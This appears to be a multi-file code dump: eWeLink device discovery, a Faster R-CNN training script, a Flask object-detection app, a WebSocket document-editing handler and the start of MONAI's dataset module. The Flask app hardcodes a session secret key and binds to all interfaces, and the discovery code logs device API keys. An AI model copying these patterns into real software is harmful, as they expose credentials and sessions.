                    Log.error('Error while trying to retrieve devices list: ' + str(data['error']))
                    return False

                for device_data in data:
                    if not CoolkitDevicesRepository.has_device(device_data['deviceid']):
                        device = CoolkitDevice(device_data)
                        CoolkitDevicesRepository.add_device(device)
                        Log.info('Found cloud device: ' + str(device) + ' -> ' + str(device.api_key))

        cls._discover_lan()
        return True

    @classmethod
    def _discover_lan(cls) -> bool:
        cls.browser = ServiceBrowser(Zeroconf(), CoolkitDevice.SERVICE_TYPE, listener=cls)
        return True

    @classmethod
    async def _discover_in_background(cls) -> None:
        while True:
            await cls.discover()
            await asyncio.sleep(60)

    @classmethod
    def _start_daemon(cls) -> None:
        loop = asyncio.new_event_loop()
        loop.run_until_complete(cls._discover_in_background())

    @classmethod
    def start_daemon(cls) -> None:
        worker = Thread(target=cls._start_daemon)
        worker.setDaemon(True)
        worker.start()

    @classmethod
    def get_device_from_service_name(cls, name: str) -> Optional[CoolkitDevice]:
        m = re.search(r'^ewelink_(\w+)', name, re.IGNORECASE)
        if not m:
            return None

        device_id = m.group(1)
        return CoolkitDevicesRepository.get_device(device_id)

    @classmethod
    def add_service(cls, zeroconf: Zeroconf, type: str, name: str) -> None:
        """Add service from service browser"""
        if type != CoolkitDevice.SERVICE_TYPE:
            return

        info = zeroconf.get_service_info(type, name)
        if info is None:
            return

        device_ip = socket.inet_ntoa(info.addresses[0])
        device_port = info.port
        device = cls.get_device_from_service_name(name)

        if device is not None:
            Log.info('Found LAN device ' + str(device) + ' -> ' + str(device_ip))
            device.ip = device_ip
            device.port = device_port
            device.client.set_service_browser(zeroconf, name)
            device.client.update_service(zeroconf, type, name)

    @classmethod
    def remove_service(cls, zeroconf: Zeroconf, type: str, name: str) -> None:
        device = cls.get_device_from_service_name(name)

        if device is not None:
            Log.info('Removed LAN device ' + str(device))
            device.ip = None
            device.port = None
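A hypothetical usage sketch of the discovery class above; it assumes CoolkitSession has already been authenticated elsewhere so get_auth_headers() and get_api_endpoint_url() return usable values.

# Run one cloud + LAN discovery pass, and keep the 60-second daemon running.
import asyncio

async def run_discovery_once():
    found = await CoolkitDevicesDiscovery.discover()   # cloud API + mDNS browse
    print('discovery succeeded:', found)

CoolkitDevicesDiscovery.start_daemon()                 # repeats discover() every 60 s
asyncio.new_event_loop().run_until_complete(run_discovery_once())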
train_faster_rcnn_alt_opt_800.py
#!/usr/bin/env python # -------------------------------------------------------- # Faster R-CNN # Copyright (c) 2015 Microsoft # Licensed under The MIT License [see LICENSE for details] # Written by Ross Girshick # -------------------------------------------------------- """Train a Faster R-CNN network using alternating optimization. This tool implements the alternating optimization algorithm described in our NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.) """ import _init_paths from fast_rcnn.train import get_training_roidb, train_net from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir from datasets.factory import get_imdb from rpn.generate import imdb_proposals import argparse import pprint import numpy as np import sys, os import multiprocessing as mp import cPickle import shutil def parse_args(): """ Parse input arguments """ parser = argparse.ArgumentParser(description='Train a Faster R-CNN network') parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]', default=0, type=int) parser.add_argument('--net_name', dest='net_name', help='network name (e.g., "ZF")', default=None, type=str) parser.add_argument('--weights', dest='pretrained_model', help='initialize with pretrained model weights', default=None, type=str) parser.add_argument('--cfg', dest='cfg_file', help='optional config file', default=None, type=str) parser.add_argument('--imdb', dest='imdb_name', help='dataset to train on', default='voc_2007_trainval', type=str) parser.add_argument('--set', dest='set_cfgs', help='set config keys', default=None, nargs=argparse.REMAINDER) if len(sys.argv) == 1: parser.print_help() sys.exit(1) args = parser.parse_args() return args def get_roidb(imdb_name, rpn_file=None): imdb = get_imdb(imdb_name) print 'Loaded dataset `{:s}` for training'.format(imdb.name) imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD) print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD) if rpn_file is not None: imdb.config['rpn_file'] = rpn_file roidb = get_training_roidb(imdb) return roidb, imdb def get_solvers(net_name): # Faster R-CNN Alternating Optimization n = 'faster_rcnn_alt_opt_800' # Solver for each training stage solvers = [[net_name, n, 'stage1_rpn_solver60k80k.pt'], [net_name, n, 'stage1_fast_rcnn_solver30k40k.pt'], [net_name, n, 'stage2_rpn_solver60k80k.pt'], [net_name, n, 'stage2_fast_rcnn_solver30k40k.pt']] solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers] # Iterations for each training stage max_iters = [80000, 40000, 80000, 40000] #max_iters = [100, 100, 100, 100] # Test prototxt for the RPN rpn_test_prototxt = os.path.join( cfg.MODELS_DIR, net_name, n, 'rpn_test.pt') return solvers, max_iters, rpn_test_prototxt # ------------------------------------------------------------------------------ # Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded # (e.g. "del net" in Python code). To work around this issue, each training # stage is executed in a separate process using multiprocessing.Process. # ------------------------------------------------------------------------------ def _init_caffe(cfg): """Initialize pycaffe in a training process. 
""" import caffe # fix the random seeds (numpy and caffe) for reproducibility np.random.seed(cfg.RNG_SEED) caffe.set_random_seed(cfg.RNG_SEED) # set up caffe caffe.set_mode_gpu() caffe.set_device(cfg.GPU_ID) def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None, max_iters=None, cfg=None): """Train a Region Proposal Network in a separate training process. """ # Not using any proposals, just ground-truth boxes cfg.TRAIN.HAS_RPN = True cfg.TRAIN.BBOX_REG = False # applies only to Fast R-CNN bbox regression cfg.TRAIN.PROPOSAL_METHOD = 'gt' cfg.TRAIN.IMS_PER_BATCH = 1 print 'Init model: {}'.format(init_model) print('Using config:') pprint.pprint(cfg) import caffe _init_caffe(cfg) roidb, imdb = get_roidb(imdb_name) print 'roidb len: {}'.format(len(roidb)) output_dir = get_output_dir(imdb) print 'Output will be saved to `{:s}`'.format(output_dir) model_paths = train_net(solver, roidb, output_dir, pretrained_model=init_model, max_iters=max_iters) # Cleanup all but the final model for i in model_paths[:-1]: os.remove(i) rpn_model_path = model_paths[-1] # Send final model path through the multiprocessing queue queue.put({'model_path': rpn_model_path}) def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None, rpn_test_prototxt=None): """Use a trained RPN to generate proposals. """ cfg.TEST.RPN_PRE_NMS_TOP_N = -1 # no pre NMS filtering cfg.TEST.RPN_POST_NMS_TOP_N = 2000 # limit top boxes after NMS print 'RPN model: {}'.format(rpn_model_path) print('Using config:') pprint.pprint(cfg) import caffe _init_caffe(cfg) # NOTE: the matlab implementation computes proposals on flipped images, too. # We compute them on the image once and then flip the already computed # proposals. This might cause a minor loss in mAP (less proposal jittering). imdb = get_imdb(imdb_name) print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name) # Load RPN and configure output directory rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST) output_dir = get_output_dir(imdb) print 'Output will be saved to `{:s}`'.format(output_dir) # Generate proposals on the imdb rpn_proposals = imdb_proposals(rpn_net, imdb) # Write proposals to disk and send the proposal file path through the # multiprocessing queue rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0] rpn_proposals_path = os.path.join( output_dir, rpn_net_name + '_proposals.pkl') with open(rpn_proposals_path, 'wb') as f: cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL) print 'Wrote RPN proposals to {}'.format(rpn_proposals_path) queue.put({'proposal_path': rpn_proposals_path}) def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None, max_iters=None, cfg=None, rpn_file=None): """Train a Fast R-CNN using proposals generated by an RPN. 
""" cfg.TRAIN.HAS_RPN = False # not generating prosals on-the-fly cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead cfg.TRAIN.IMS_PER_BATCH = 2 print 'Init model: {}'.format(init_model) print 'RPN proposals: {}'.format(rpn_file) print('Using config:') pprint.pprint(cfg) import caffe _init_caffe(cfg) roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file) output_dir = get_output_dir(imdb) print 'Output will be saved to `{:s}`'.format(output_dir) # Train Fast R-CNN model_paths = train_net(solver, roidb, output_dir, pretrained_model=init_model, max_iters=max_iters) # Cleanup all but the final model for i in model_paths[:-1]: os.remove(i) fast_rcnn_model_path = model_paths[-1] # Send Fast R-CNN model path over the multiprocessing queue queue.put({'model_path': fast_rcnn_model_path}) if __name__ == '__main__': args = parse_args() print('Called with args:') print(args) if args.cfg_file is not None: cfg_from_file(args.cfg_file) if args.set_cfgs is not None: cfg_from_list(args.set_cfgs) cfg.GPU_ID = args.gpu_id # -------------------------------------------------------------------------- # Pycaffe doesn't reliably free GPU memory when instantiated nets are # discarded (e.g. "del net" in Python code). To work around this issue, each # training stage is executed in a separate process using # multiprocessing.Process. # -------------------------------------------------------------------------- # queue for communicated results between processes mp_queue = mp.Queue() # solves, iters, etc. for each training stage solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name) print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' print 'Stage 1 RPN, init from ImageNet model' print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' cfg.TRAIN.SNAPSHOT_INFIX = 'stage1' mp_kwargs = dict( queue=mp_queue, imdb_name=args.imdb_name, init_model=args.pretrained_model, solver=solvers[0], max_iters=max_iters[0], cfg=cfg) p = mp.Process(target=train_rpn, kwargs=mp_kwargs) p.start() rpn_stage1_out = mp_queue.get() p.join() print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' print 'Stage 1 RPN, generate proposals' print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' mp_kwargs = dict( queue=mp_queue, imdb_name=args.imdb_name, rpn_model_path=str(rpn_stage1_out['model_path']), cfg=cfg, rpn_test_prototxt=rpn_test_prototxt) p = mp.Process(target=rpn_generate, kwargs=mp_kwargs) p.start() rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path'] p.join() print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' print 'Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model' print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' cfg.TRAIN.SNAPSHOT_INFIX = 'stage1' mp_kwargs = dict( queue=mp_queue, imdb_name=args.imdb_name, init_model=args.pretrained_model, solver=solvers[1], max_iters=max_iters[1], cfg=cfg, rpn_file=rpn_stage1_out['proposal_path']) p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs) p.start() fast_rcnn_stage1_out = mp_queue.get() p.join() print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' print 'Stage 2 RPN, init from stage 1 Fast R-CNN model' print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' cfg.TRAIN.SNAPSHOT_INFIX = 'stage2' mp_kwargs = dict( queue=mp_queue, imdb_name=args.imdb_name, init_model=str(fast_rcnn_stage1_out['model_path']), solver=solvers[2], max_iters=max_iters[2], cfg=cfg) p = mp.Process(target=train_rpn, kwargs=mp_kwargs) p.start() 
rpn_stage2_out = mp_queue.get() p.join() print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' print 'Stage 2 RPN, generate proposals' print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' mp_kwargs = dict( queue=mp_queue, imdb_name=args.imdb_name, rpn_model_path=str(rpn_stage2_out['model_path']), cfg=cfg, rpn_test_prototxt=rpn_test_prototxt) p = mp.Process(target=rpn_generate, kwargs=mp_kwargs) p.start() rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path'] p.join() print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' print 'Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model' print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' cfg.TRAIN.SNAPSHOT_INFIX = 'stage2' mp_kwargs = dict( queue=mp_queue, imdb_name=args.imdb_name, init_model=str(rpn_stage2_out['model_path']), solver=solvers[3], max_iters=max_iters[3], cfg=cfg, rpn_file=rpn_stage2_out['proposal_path']) p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs) p.start() fast_rcnn_stage2_out = mp_queue.get() p.join() # Create final model (just a copy of the last stage) final_path = os.path.join( os.path.dirname(fast_rcnn_stage2_out['model_path']), args.net_name + '_faster_rcnn_final.caffemodel') print 'cp {} -> {}'.format( fast_rcnn_stage2_out['model_path'], final_path) shutil.copy(fast_rcnn_stage2_out['model_path'], final_path) print 'Final model: {}'.format(final_path)
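The per-stage multiprocessing workaround described in the comments above, reduced to its skeleton: each stage runs in its own process so pycaffe's GPU memory is released when the process exits, and the result comes back over a Queue. The stage body here is a placeholder, not the real training code.

# Skeleton of the run-a-stage-in-a-subprocess pattern used by this script.
import multiprocessing as mp

def stage(queue=None, **kwargs):
    # ... train something, then hand the result back ...
    queue.put({'model_path': '/tmp/example.caffemodel'})  # placeholder result

if __name__ == '__main__':
    q = mp.Queue()
    p = mp.Process(target=stage, kwargs=dict(queue=q))
    p.start()
    out = q.get()   # read the result before join(), as the script above does
    p.join()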
detector_app.py
import io import base64 import sys import tempfile import cv2 import time import argparse import datetime import numpy as np from queue import Queue from threading import Thread MODEL_BASE = '/home/anoop/models/research' sys.path.append(MODEL_BASE) sys.path.append(MODEL_BASE + '/object_detection') sys.path.append(MODEL_BASE + '/slim') from flask import Flask from flask import redirect from flask import render_template from flask import request from flask import Response from flask import url_for from flask import session from flask_wtf.file import FileField import numpy as np from PIL import Image from PIL import ImageDraw import tensorflow as tf from utils import label_map_util from utils import visualization_utils as vis_util from werkzeug.datastructures import CombinedMultiDict from wtforms import Form from wtforms import ValidationError from cv2 import imencode from app_utils import draw_boxes_and_labels app = Flask(__name__) PATH_TO_CKPT = '/home/anoop/tensorflow/ssd_inception_v2_coco_11_06_2017/frozen_inference_graph.pb' PATH_TO_LABELS = MODEL_BASE + '/object_detection/data/mscoco_label_map.pbtxt' content_types = {'jpg': 'image/jpeg', 'jpeg': 'image/jpeg', 'png': 'image/png'} extensions = sorted(content_types.keys()) # Helper Functions class FPS: def __init__(self): # store the start time, end time, and total number of frames # that were examined between the start and end intervals self._start = None self._end = None self._numFrames = 0 def start(self): # start the timer self._start = datetime.datetime.now() return self def stop(self): # stop the timer self._end = datetime.datetime.now() def update(self): # increment the total number of frames examined during the # start and end intervals self._numFrames += 1 def elapsed(self): # return the total number of seconds between the start and # end interval return (self._end - self._start).total_seconds() def fps(self): # compute the (approximate) frames per second return self._numFrames / self.elapsed() class WebcamVideoStream: def __init__(self, src, width, height): # initialize the video camera stream and read the first frame # from the stream self.src = src self.width = width self.height = height #self.stream = cv2.VideoCapture(src) #self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width) #self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height) #(self.grabbed, self.frame) = self.stream.read() # initialize the variable used to indicate if the thread should # be stopped self.stopped = False def init(self): self.stream = cv2.VideoCapture(self.src) self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, self.width) self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height) (self.grabbed, self.frame) = self.stream.read() def start(self): # start the thread to read frames from the video stream self.camthread = Thread(target=self.update, args=()) self.camthread.start() return self def update(self): # keep looping infinitely until the thread is stopped while True: # if the thread indicator variable is set, stop the thread if self.stopped: self.stream.release() return # otherwise, read the next frame from the stream (self.grabbed, self.frame) = self.stream.read() def read(self): # return the frame most recently read return self.frame def stop(self): # indicate that the thread should be stopped self.stopped = True def is_image(): def _is_image(form, field): if not field.data: raise ValidationError() elif field.data.filename.split('.')[-1].lower() not in extensions: raise ValidationError() return _is_image def draw_bounding_box_on_image(image, box, color='red', thickness=4): 
draw = ImageDraw.Draw(image) im_width, im_height = image.size ymin, xmin, ymax, xmax = box (left, right, top, bottom) = (xmin * im_width, xmax * im_width, ymin * im_height, ymax * im_height) draw.line([(left, top), (left, bottom), (right, bottom), (right, top), (left, top)], width=thickness, fill=color) def encode_image(image): image_buffer = io.BytesIO() image.save(image_buffer, format='PNG') mime_str = 'data:image/png;base64,' imgstr = '{0!s}'.format(base64.b64encode(image_buffer.getvalue())) quote_index = imgstr.find("b'") end_quote_index = imgstr.find("'", quote_index+2) imgstr = imgstr[quote_index+2:end_quote_index] imgstr = mime_str + imgstr #imgstr = 'data:image/png;base64,{0!s}'.format( #base64.b64encode(image_buffer.getvalue())) return imgstr # Webcam feed Helper def worker(input_q, output_q): detection_graph = client.detection_graph sess = client.sess fps = FPS().start() while True: fps.update() frame = input_q.get() frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) output_q.put(detect_objects_webcam(frame_rgb, sess, detection_graph)) fps.stop() sess.close() # detector for web camera def detect_objects_webcam(image_np, sess, detection_graph): # Expand dimensions since the model expects images to have shape: [1, None, None, 3] image_np_expanded = np.expand_dims(image_np, axis=0) image_tensor = detection_graph.get_tensor_by_name('image_tensor:0') # Each box represents a part of the image where a particular object was detected. boxes = detection_graph.get_tensor_by_name('detection_boxes:0') # Each score represent how level of confidence for each of the objects. # Score is shown on the result image, together with the class label. scores = detection_graph.get_tensor_by_name('detection_scores:0') classes = detection_graph.get_tensor_by_name('detection_classes:0') num_detections = detection_graph.get_tensor_by_name('num_detections:0') # Actual detection. (boxes, scores, classes, num_detections) = sess.run( [boxes, scores, classes, num_detections], feed_dict={image_tensor: image_np_expanded}) # Visualization of the results of a detection. 
rect_points, class_names, class_colors = draw_boxes_and_labels( boxes=np.squeeze(boxes), classes=np.squeeze(classes).astype(np.int32), scores=np.squeeze(scores), category_index=client.category_index, min_score_thresh=.5 ) return dict(rect_points=rect_points, class_names=class_names, class_colors=class_colors) # Image class class PhotoForm(Form): input_photo = FileField( 'File extension should be: %s (case-insensitive)' % ', '.join(extensions), validators=[is_image()]) class VideoForm(Form): input_video = FileField() # Obect Dection Class class ObjectDetector(object): def __init__(self): self.detection_graph = self._build_graph() self.sess = tf.Session(graph=self.detection_graph) label_map = label_map_util.load_labelmap(PATH_TO_LABELS) categories = label_map_util.convert_label_map_to_categories( label_map, max_num_classes=90, use_display_name=True) self.category_index = label_map_util.create_category_index(categories) def _build_graph(self): detection_graph = tf.Graph() with detection_graph.as_default(): od_graph_def = tf.GraphDef() with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid: serialized_graph = fid.read() od_graph_def.ParseFromString(serialized_graph) tf.import_graph_def(od_graph_def, name='') return detection_graph def _load_image_into_numpy_array(self, image): (im_width, im_height) = image.size return np.array(image.getdata()).reshape( (im_height, im_width, 3)).astype(np.uint8) def detect(self, image): image_np = self._load_image_into_numpy_array(image) image_np_expanded = np.expand_dims(image_np, axis=0) graph = self.detection_graph image_tensor = graph.get_tensor_by_name('image_tensor:0') boxes = graph.get_tensor_by_name('detection_boxes:0') scores = graph.get_tensor_by_name('detection_scores:0') classes = graph.get_tensor_by_name('detection_classes:0') num_detections = graph.get_tensor_by_name('num_detections:0') (boxes, scores, classes, num_detections) = self.sess.run( [boxes, scores, classes, num_detections], feed_dict={image_tensor: image_np_expanded}) boxes, scores, classes, num_detections = map( np.squeeze, [boxes, scores, classes, num_detections]) return boxes, scores, classes.astype(int), num_detections.astype(int) # Detection function def detect_objects(image_path): image = Image.open(image_path).convert('RGB') boxes, scores, classes, num_detections = client.detect(image) image.thumbnail((480, 480), Image.ANTIALIAS) new_images = {} for i in range(num_detections): if scores[i] < 0.7: continue cls = classes[i] if cls not in new_images.keys(): new_images[cls] = image.copy() draw_bounding_box_on_image(new_images[cls], boxes[i], thickness=int(scores[i]*10)-4) result = {} result['original'] = encode_image(image.copy()) for cls, new_image in new_images.items(): category = client.category_index[cls]['name'] result[category] = encode_image(new_image) return result @app.route('/') def main_display(): photo_form = PhotoForm(request.form) video_form = VideoForm(request.form) #return render_template('main.html', photo_form=photo_form, result={}) return render_template('main.html', photo_form=photo_form, video_form=video_form, result={}) @app.route('/imgproc', methods=['GET', 'POST']) def imgproc(): video_form = VideoForm(request.form) form = PhotoForm(CombinedMultiDict((request.files, request.form))) if request.method == 'POST' and form.validate(): with tempfile.NamedTemporaryFile() as temp: form.input_photo.data.save(temp) temp.flush() print(temp.name) result = detect_objects(temp.name) photo_form = PhotoForm(request.form) return render_template('main.html', photo_form=photo_form, 
video_form=video_form, result=result) else: return redirect(url_for('main_display')) @app.route('/vidproc', methods=['GET', 'POST']) def vidproc(): print("In vidproc") form = VideoForm(CombinedMultiDict((request.files, request.form))) if request.method == 'POST': print("vid sub") with tempfile.NamedTemporaryFile(delete=False) as temp: form.input_video.data.save(temp) temp.flush() session['vid'] = temp.name return render_template('video.html') @app.route('/vidpros') def vidpros(): graph = client.detection_graph image_tensor = graph.get_tensor_by_name('image_tensor:0') boxes = graph.get_tensor_by_name('detection_boxes:0') scores = graph.get_tensor_by_name('detection_scores:0') classes = graph.get_tensor_by_name('detection_classes:0') num_detections = graph.get_tensor_by_name('num_detections:0') vid_source = cv2.VideoCapture(session['vid']) print("vid src") def generate(image_tensor, boxes, scores, classes, num_detections): ret, frame = vid_source.read() # tensor code while ret: #image_np = client._load_image_into_numpy_array(frame) image_np_expanded = np.expand_dims(frame, axis=0) (boxes_t, scores_t, classes_t, num_detections_t) = client.sess.run( [boxes, scores, classes, num_detections], feed_dict={image_tensor: image_np_expanded}) vis_util.visualize_boxes_and_labels_on_image_array( frame, np.squeeze(boxes_t), np.squeeze(classes_t).astype(np.int32), np.squeeze(scores_t), client.category_index, use_normalized_coordinates=True, line_thickness=8) #image_pil = Image.fromarray(np.uint8(frame)).convert('RGB') payload = cv2.imencode('.jpg', frame)[1].tobytes() yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + payload + b'\r\n') ret, frame = vid_source.read() print("Before return") return Response(generate(image_tensor, boxes, scores, classes, num_detections), mimetype='multipart/x-mixed-replace; boundary=frame') @app.route('/realproc', methods=['GET', 'POST']) def realproc(): return render_template('realtime.html') @app.route('/realstop', methods=['GET', 'POST']) def realstop(): photo_form = PhotoForm(request.form) video_form = VideoForm(request.form) if request.method == 'POST': print("In - Stop - POST") if request.form['realstop'] == 'Stop Web Cam': print(request.form['realstop']) fps_init.stop() video_init.stop() video_init.update() print("Stopped") return render_template('main.html', photo_form=photo_form, video_form=video_form) @app.route('/realpros') def realpros(): print("in real pros") input_q = Queue(5) output_q = Queue() for i in range(1): t = Thread(target=worker, args=(input_q, output_q)) t.daemon = True t.start() video_init.init() video_capture = video_init.start() fps = fps_init.start() def generate(): print("in gen real pros") frame = video_capture.read() while video_capture.grabbed: print("in while gen real pros") input_q.put(frame) t = time.time() if output_q.empty(): pass else: font = cv2.FONT_HERSHEY_SIMPLEX data = output_q.get() rec_points = data['rect_points'] class_names = data['class_names'] class_colors = data['class_colors'] for point, name, color in zip(rec_points, class_names, class_colors): cv2.rectangle(frame, (int(point['xmin'] * 480), int(point['ymin'] * 360)), (int(point['xmax'] * 480), int(point['ymax'] * 360)), color, 3) cv2.rectangle(frame, (int(point['xmin'] * 480), int(point['ymin'] * 360)), (int(point['xmin'] * 480) + len(name[0]) * 6, int(point['ymin'] * 360) - 10), color, -1, cv2.LINE_AA) cv2.putText(frame, name[0], (int(point['xmin'] * 480), int(point['ymin'] * 360)), font, 0.3, (0, 0, 0), 1) payload = cv2.imencode('.jpg', frame)[1].tobytes() 
yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + payload + b'\r\n') frame = video_capture.read() #video_capture.update() print("out of while") fps.update() return Response(generate(), mimetype='multipart/x-mixed-replace; boundary=frame') client = ObjectDetector() video_init = WebcamVideoStream(src=1, width=480, height=360) fps_init = FPS() app.secret_key = 'super secret key' app.config['SESSION_TYPE'] = 'filesystem' if __name__ == '__main__': app.secret_key = 'super secret key' app.config['SESSION_TYPE'] = 'filesystem' sess.init_app(app) app.run(host='0.0.0.0', port=80, debug=False)
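# --- Hedged usage sketch (not part of the original app) --------------------
# A minimal, self-contained illustration of the MJPEG streaming pattern used
# by /vidpros and /realpros above: a generator yields JPEG-encoded frames
# wrapped in multipart boundaries, and Flask serves them with the
# 'multipart/x-mixed-replace' mimetype.  The camera index 0, the `demo_app`
# instance and the '/stream_demo' route name are illustrative assumptions.
import cv2
from flask import Flask, Response

demo_app = Flask(__name__)

def mjpeg_frames(capture):
    """Yield one multipart-encoded JPEG per captured frame."""
    ok, frame = capture.read()
    while ok:
        payload = cv2.imencode('.jpg', frame)[1].tobytes()
        yield (b'--frame\r\n'
               b'Content-Type: image/jpeg\r\n\r\n' + payload + b'\r\n')
        ok, frame = capture.read()

@demo_app.route('/stream_demo')
def stream_demo():
    capture = cv2.VideoCapture(0)  # assumed default webcam
    return Response(mjpeg_frames(capture),
                    mimetype='multipart/x-mixed-replace; boundary=frame')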
connection.py
from json import dumps, loads from logging import getLogger from threading import Thread from .api import aggregate from .protocol import * __all__ = ["Connection"] class Connection(object): """Handles an open connection between the server and the JS client.""" def __init__(self, socket, database): self._socket = socket self._client = "%04d" % (id(self._socket) % 10000) self._state = STATE_WAITING self._database = database self._document = None self._processed = [] self._logger = getLogger("gunicorn.error") self._log("INFO", "Connection opened.") def _log(self, event, data): """Send a debug message to the terminal.""" events = { "INFO": (self._logger.info, u"\x1b[33m{0} \x1b[36m!!\x1b[0m {1}"), "SEND": (self._logger.debug, u"\x1b[33m{0} \x1b[31m<-\x1b[0m {1}"), "RECV": (self._logger.debug, u"\x1b[33m{0} \x1b[32m->\x1b[0m {1}") } func, template = events[event] func(template.format(self._client, data).encode("utf8")) def _send(self, verb, payload=None): """Send data to the client.""" data = (verb + " " + payload) if payload else verb self._log("SEND", data) self._socket.send(data) def _error(self, reply=REPLY_INVALID): """Client has sent bad data; close the connection with an error.""" self._state = STATE_CLOSING self._send(SVERB_INVALID, reply) def _handle_keywords(self, keywords): """Handle a keyword update in the document. Maybe reply with stuff.""" def inner(): for keyword in keywords: if keyword in self._processed: continue self._processed.append(keyword) for box in aggregate(keyword): if self._state != STATE_READY: return self._send(SVERB_UPDATE, dumps(box)) thread = Thread(target=inner) thread.daemon = True thread.start() def _handle_state_waiting(self, verb, data): """Handle input from the client when in the "waiting" state.""" if verb == CVERB_OPEN: self._state = STATE_READY self._document = doc = self._database.get_document(data) if not doc: self._error(REPLY_NODOC) return payload = {"title": doc.title, "text": doc.text} self._send(SVERB_READY, dumps(payload)) self._handle_keywords(doc.keywords) if not self._database.lock_document(doc.docid): self._error(REPLY_LOCKED) del self._document return else: self._error() def _handle_state_ready(self, verb, data): """Handle input from the client when in the "ready" state.""" if verb == CVERB_UPDATE: try: data = loads(data) except ValueError: self._error() return if "title" in data: self._document.title = data["title"] if "text" in data: self._document.text = data["text"] if "keywords" in data: self._handle_keywords(data["keywords"]) self._database.save_document(self._document) elif verb == CVERB_CLOSE: self._state = STATE_CLOSING self._send(SVERB_BYE) else: self._error() def handle(self): """Handle the main server/client connection loop.""" while self._state != STATE_CLOSING: data = self._socket.receive() if data is None: self._state = STATE_CLOSING break data = data.strip() self._log("RECV", data) if not data: self._error() break try: verb, data = data.split(" ", 1) except ValueError: verb, data = data, None if self._state == STATE_WAITING: self._handle_state_waiting(verb, data) elif self._state == STATE_READY: self._handle_state_ready(verb, data) def finish(self): """Close the connection and save all data.""" if self._document: self._database.save_document(self._document) self._database.unlock_document(self._document.docid) self._log("INFO", "Connection closed.")
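# --- Hedged usage sketch (not from the original project) -------------------
# How a WebSocket handler might drive a Connection instance.  The `ws` object
# is assumed to expose the receive()/send() methods Connection relies on
# (e.g. a gevent-websocket socket), and `database` is assumed to implement the
# get_document()/lock_document()/save_document()/unlock_document() interface
# used above.

def websocket_app(ws, database):
    """Serve one JS client: run the protocol loop, then persist and unlock."""
    connection = Connection(ws, database)
    try:
        connection.handle()   # blocks until the client closes or sends bad data
    finally:
        connection.finish()   # save the document and release its lock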
dataset.py
# Copyright 2020 - 2021 MONAI Consortium # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import collections.abc import math import pickle import shutil import sys import tempfile import threading import time import warnings from copy import deepcopy from multiprocessing.pool import ThreadPool from pathlib import Path from typing import IO, TYPE_CHECKING, Any, Callable, Dict, List, Optional, Sequence, Union import numpy as np import torch from torch.utils.data import Dataset as _TorchDataset from torch.utils.data import Subset from monai.data.utils import convert_tables_to_dicts, first, pickle_hashing from monai.transforms import Compose, Randomizable, ThreadUnsafe, Transform, apply_transform from monai.utils import MAX_SEED, ensure_tuple, get_seed, min_version, optional_import if TYPE_CHECKING: from tqdm import tqdm has_tqdm = True else: tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm") lmdb, _ = optional_import("lmdb") pd, _ = optional_import("pandas") class Dataset(_TorchDataset): """ A generic dataset with a length property and an optional callable data transform when fetching a data sample. If passing slicing indices, will return a PyTorch Subset, for example: `data: 